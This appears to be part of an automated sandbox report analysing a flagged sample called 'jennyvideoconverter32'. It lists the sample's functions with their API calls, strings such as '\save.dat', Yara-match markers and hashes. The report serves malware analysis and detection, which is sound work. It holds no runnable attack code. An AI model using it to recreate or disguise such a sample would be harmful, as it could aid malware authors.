                                                                            • Instruction ID: ee9284de44bf0bc9dd2ca08abb1f0b12675ac722b59f60ddc2922b72fafc921f
                                                                            • Opcode Fuzzy Hash: f6efb48e992d24cd4ed7b04358a9b1afc063843e6d1a44b1be6b100831b6f7fd
                                                                            • Instruction Fuzzy Hash: 1361A371D40229DFDF20DFA5C980AEDBBB6AF48314F10E169E406AB241D7709A49CF61
                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(?,00000000), ref: 00404ED1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: Info
                                                                            • String ID: $
                                                                            • API String ID: 1807457897-3032137957
                                                                            • Opcode ID: ade2e129719512a706aeac876f0a8c01095c6a06ec5d81e25aee3eb1febfb5f9
                                                                            • Instruction ID: e64d793a5bd47a750bf71bc710b27f1b951018593c94bf49e3c2bba34da37a12
                                                                            • Opcode Fuzzy Hash: ade2e129719512a706aeac876f0a8c01095c6a06ec5d81e25aee3eb1febfb5f9
                                                                            • Instruction Fuzzy Hash: 1D416B710142985EEB169714CE59FEB3FE8EB02704F1404F6DA49F61D2C2794924DBBB
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02E28306,?,?,00000000), ref: 02E29603
                                                                            • getsockname.WS2_32(?,?,?), ref: 02E29619
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastgetsockname
                                                                            • String ID: &'
                                                                            • API String ID: 566540725-655172784
                                                                            • Opcode ID: c1376528eaa8a5636c7e301bdbd124b4ad69de3af3bc4179b13900f73389cad1
                                                                            • Instruction ID: d57a50b7ac3fa8c19a73f2581dfa63d63ad0f5e13c9d4dc5d93bf00c7f5fced4
                                                                            • Opcode Fuzzy Hash: c1376528eaa8a5636c7e301bdbd124b4ad69de3af3bc4179b13900f73389cad1
                                                                            • Instruction Fuzzy Hash: CD218176A40218DBDB10DF68D844ACEB7F5FF48324F20D56AE919EB281D730A9458B90
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E2CBE7
                                                                              • Part of subcall function 02E2D1C3: std::exception::exception.LIBCMT ref: 02E2D1F2
                                                                              • Part of subcall function 02E2D979: __EH_prolog.LIBCMT ref: 02E2D97E
                                                                              • Part of subcall function 02E33A8F: _malloc.LIBCMT ref: 02E33AA7
                                                                              • Part of subcall function 02E2D222: __EH_prolog.LIBCMT ref: 02E2D227
                                                                            Strings
                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02E2CC1D
                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02E2CC24
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                            • API String ID: 1953324306-1943798000
                                                                            • Opcode ID: c437f2866a92ed939ed29c2e3997e0eb40aadafb77e40b2b505fbf658e5aebb0
                                                                            • Instruction ID: 0c017e3b728562e85b11574be3c838cb1d48fbe5f2956ab0ce1dc795ea8e13dc
                                                                            • Opcode Fuzzy Hash: c437f2866a92ed939ed29c2e3997e0eb40aadafb77e40b2b505fbf658e5aebb0
                                                                            • Instruction Fuzzy Hash: A321D571D802649ADB18EFE4E815AEDBBB5EF04304F10A04EF806A7280DF705948CF51
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E2CCDC
                                                                              • Part of subcall function 02E2D29A: std::exception::exception.LIBCMT ref: 02E2D2C7
                                                                              • Part of subcall function 02E2DAB0: __EH_prolog.LIBCMT ref: 02E2DAB5
                                                                              • Part of subcall function 02E33A8F: _malloc.LIBCMT ref: 02E33AA7
                                                                              • Part of subcall function 02E2D2F7: __EH_prolog.LIBCMT ref: 02E2D2FC
                                                                            Strings
                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02E2CD12
                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02E2CD19
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                            • API String ID: 1953324306-412195191
                                                                            • Opcode ID: d7b8a1083055ac08fbf06f56ceb2631ee263032c7171447245b9c884ee3a3b2b
                                                                            • Instruction ID: bdd38014d49964b5240f5913dcdabc490f6173f6f1bea72aa23a5e5998ddb393
                                                                            • Opcode Fuzzy Hash: d7b8a1083055ac08fbf06f56ceb2631ee263032c7171447245b9c884ee3a3b2b
                                                                            • Instruction Fuzzy Hash: 3E21A575D80264DBDB08EFE4E854AADBBB5EF55304F10914DF90AAB280DF705948CF91
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 02E2535D
                                                                              • Part of subcall function 02E32EEC: __FF_MSGBANNER.LIBCMT ref: 02E32F03
                                                                              • Part of subcall function 02E32EEC: __NMSG_WRITE.LIBCMT ref: 02E32F0A
                                                                              • Part of subcall function 02E32EEC: RtlAllocateHeap.NTDLL(00AD0000,00000000,00000001), ref: 02E32F2F
                                                                            • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02E2536F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                            • String ID: \save.dat
                                                                            • API String ID: 4128168839-3580179773
                                                                            • Opcode ID: f03ed706e2058cff003f910d4665104360557be476380a5a98fd2a9970b2cf48
                                                                            • Instruction ID: 82480581d98b2bacf67d1632715ab4d39091ab6ed68e236bb279bda349f283cf
                                                                            • Opcode Fuzzy Hash: f03ed706e2058cff003f910d4665104360557be476380a5a98fd2a9970b2cf48
                                                                            • Instruction Fuzzy Hash: 78117D729442506BDB268E258D84D6FFFABDF82654B50A1A8F84567305DAA20D06C6E0
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E2396A
                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02E239C1
                                                                              • Part of subcall function 02E21410: std::exception::exception.LIBCMT ref: 02E21428
                                                                              • Part of subcall function 02E2A551: __EH_prolog.LIBCMT ref: 02E2A556
                                                                              • Part of subcall function 02E2A551: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02E2A565
                                                                              • Part of subcall function 02E2A551: __CxxThrowException@8.LIBCMT ref: 02E2A584
                                                                            Strings
                                                                            • Day of month is not valid for year, xrefs: 02E239AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                            • String ID: Day of month is not valid for year
                                                                            • API String ID: 1404951899-1521898139
                                                                            • Opcode ID: 6c2c987a4ed68586c8973b2ef6066de5dff76c1a995ac5043ef29e78ed3da344
                                                                            • Instruction ID: c9547d7b1ac99dabf727abce2a69a50e538bfea7b4e56752fca1dea32c4383ec
                                                                            • Opcode Fuzzy Hash: 6c2c987a4ed68586c8973b2ef6066de5dff76c1a995ac5043ef29e78ed3da344
                                                                            • Instruction Fuzzy Hash: BA01B576850219AADF04EFA4D805AEEB779FF14710F40D01AFC05A3300EB749A59CB95
                                                                            APIs
                                                                            • std::exception::exception.LIBCMT ref: 02E2FA4A
                                                                            • __CxxThrowException@8.LIBCMT ref: 02E2FA5F
                                                                              • Part of subcall function 02E33A8F: _malloc.LIBCMT ref: 02E33AA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                            • String ID: bad allocation
                                                                            • API String ID: 4063778783-2104205924
                                                                            • Opcode ID: 0166738ba9e9ef68f7093f57c99fea5c8012c9fd93c18b1025d3347ca3fb7595
                                                                            • Instruction ID: 6b37c591407231558753896ad099ed36b19373afeda70109cd9f054de4d1df02
                                                                            • Opcode Fuzzy Hash: 0166738ba9e9ef68f7093f57c99fea5c8012c9fd93c18b1025d3347ca3fb7595
                                                                            • Instruction Fuzzy Hash: 0AF0E9B068031996DF05EA949815EAF73ECBB04219B40E569B922D2580EF70E508C694
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E23C1B
                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02E23C30
                                                                              • Part of subcall function 02E323F7: std::exception::exception.LIBCMT ref: 02E32401
                                                                              • Part of subcall function 02E2A58A: __EH_prolog.LIBCMT ref: 02E2A58F
                                                                              • Part of subcall function 02E2A58A: __CxxThrowException@8.LIBCMT ref: 02E2A5B8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                            • String ID: bad cast
                                                                            • API String ID: 1300498068-3145022300
                                                                            • Opcode ID: c6dee4459f4b36103fafb28d9fea259e39a5bcfba024748748a28906cae08376
                                                                            • Instruction ID: 409542d3c8a35dd8fdf60f9d6a7d3d8334a78f885e2e1fe97444b43ce455cf1c
                                                                            • Opcode Fuzzy Hash: c6dee4459f4b36103fafb28d9fea259e39a5bcfba024748748a28906cae08376
                                                                            • Instruction Fuzzy Hash: C4F0A7729805049BC709DF54E4515EAB775EF61315F00D06EFE065B240CF72994ACE91
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E238D2
                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02E238F1
                                                                              • Part of subcall function 02E21410: std::exception::exception.LIBCMT ref: 02E21428
                                                                              • Part of subcall function 02E288BF: _memmove.LIBCMT ref: 02E288DF
                                                                            Strings
                                                                            • Year is out of valid range: 1400..10000, xrefs: 02E238E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                            • String ID: Year is out of valid range: 1400..10000
                                                                            • API String ID: 3258419250-2344417016
                                                                            • Opcode ID: 84de3a730b96ea0552ed9ae2532a5b9f4b55aa7e62e4799d707fcfcc69b891c7
                                                                            • Instruction ID: ade1c5c865902e032e5d40da6b30d4b06cf3f3418100b91fcc9a1d9122e39af2
                                                                            • Opcode Fuzzy Hash: 84de3a730b96ea0552ed9ae2532a5b9f4b55aa7e62e4799d707fcfcc69b891c7
                                                                            • Instruction Fuzzy Hash: E1E0D872ED012497E724FF989C127DDB775DB18710F40A45AF40677680DEB12948CBA1
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E23886
                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02E238A5
                                                                              • Part of subcall function 02E21410: std::exception::exception.LIBCMT ref: 02E21428
                                                                              • Part of subcall function 02E288BF: _memmove.LIBCMT ref: 02E288DF
                                                                            Strings
                                                                            • Day of month value is out of range 1..31, xrefs: 02E23894
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                            • String ID: Day of month value is out of range 1..31
                                                                            • API String ID: 3258419250-1361117730
                                                                            • Opcode ID: a915a5fa0ac781885954fec9156479e71f1ad17563c9195b877740028294e3e9
                                                                            • Instruction ID: 62dfa4bd6364d4c2bab0669a7bb4ba0696b66274d31dee12f8cb7061aa51018d
                                                                            • Opcode Fuzzy Hash: a915a5fa0ac781885954fec9156479e71f1ad17563c9195b877740028294e3e9
                                                                            • Instruction Fuzzy Hash: F5E09272A9011497E714EB949C12BDDB765DB18B10F40A15AE40677680DEB12944CBA5
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E2391E
                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02E2393D
                                                                              • Part of subcall function 02E21410: std::exception::exception.LIBCMT ref: 02E21428
                                                                              • Part of subcall function 02E288BF: _memmove.LIBCMT ref: 02E288DF
                                                                            Strings
                                                                            • Month number is out of range 1..12, xrefs: 02E2392C
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                            • String ID: Month number is out of range 1..12
                                                                            • API String ID: 3258419250-4198407886
                                                                            • Opcode ID: 99ae6c9c83dc40cb51d0f1aab0d3f1c3e93e1da713180d0a08f88119bb78d7f8
                                                                            • Instruction ID: 2960efdcc9dde37bb38804a46f2530d33524473e71d2313d6cbe5cdc1d49d348
                                                                            • Opcode Fuzzy Hash: 99ae6c9c83dc40cb51d0f1aab0d3f1c3e93e1da713180d0a08f88119bb78d7f8
                                                                            • Instruction Fuzzy Hash: E7E09272A9011897E718FB949C127DDB765DB18710F40A05AE80677680DEB12944CBA1
                                                                            APIs
                                                                            • TlsAlloc.KERNEL32 ref: 02E219CC
                                                                            • GetLastError.KERNEL32 ref: 02E219D9
                                                                              • Part of subcall function 02E21712: __EH_prolog.LIBCMT ref: 02E21717
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocErrorH_prologLast
                                                                            • String ID: tss
                                                                            • API String ID: 249634027-1638339373
                                                                            • Opcode ID: 2f0ad1652ac70d867c163bbdbf358a55c64a4a1b87e9e422f3a54d197c557ec5
                                                                            • Instruction ID: 70ca476facdcd5c7a904b8fb94cba03fc2d818c3b5f8ed248cef08df0c213f2c
                                                                            • Opcode Fuzzy Hash: 2f0ad1652ac70d867c163bbdbf358a55c64a4a1b87e9e422f3a54d197c557ec5
                                                                            • Instruction Fuzzy Hash: 26E08675D852205BC7007B79E80908BBBE49A41235F10DB66FCBE872D0EB3099558BC6
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E23BD8
                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02E23BED
                                                                              • Part of subcall function 02E323F7: std::exception::exception.LIBCMT ref: 02E32401
                                                                              • Part of subcall function 02E2A58A: __EH_prolog.LIBCMT ref: 02E2A58F
                                                                              • Part of subcall function 02E2A58A: __CxxThrowException@8.LIBCMT ref: 02E2A5B8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                            • String ID: bad cast
                                                                            • API String ID: 1300498068-3145022300
                                                                            • Opcode ID: 5d6acfc4eb69fe51fb27d9ee9f6191e8597072baa88046734381a868a60b42cf
                                                                            • Instruction ID: d7b2e0bd2ddc5d1c0b7142fd41af7145930b3b2a01bd7d29b9c216036f77ed4e
                                                                            • Opcode Fuzzy Hash: 5d6acfc4eb69fe51fb27d9ee9f6191e8597072baa88046734381a868a60b42cf
                                                                            • Instruction Fuzzy Hash: A9E09A709801089BC704EF54E511BA8B775EF20304F40D0A9EA0617280CF31994ACE86
                                                                            APIs
                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 00404494
                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044C8
                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044E2
                                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: AllocHeap$FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 3499195154-0
                                                                            • Opcode ID: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
                                                                            • Instruction ID: 6532d2b8740b88ca5c68c93f46193dcc45771cdeba7f909f778517217a69801f
                                                                            • Opcode Fuzzy Hash: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
                                                                            • Instruction Fuzzy Hash: 02113670200301AFC731CF29EE45A627BB5FB847207104A3AF252E65F0D775A866EF19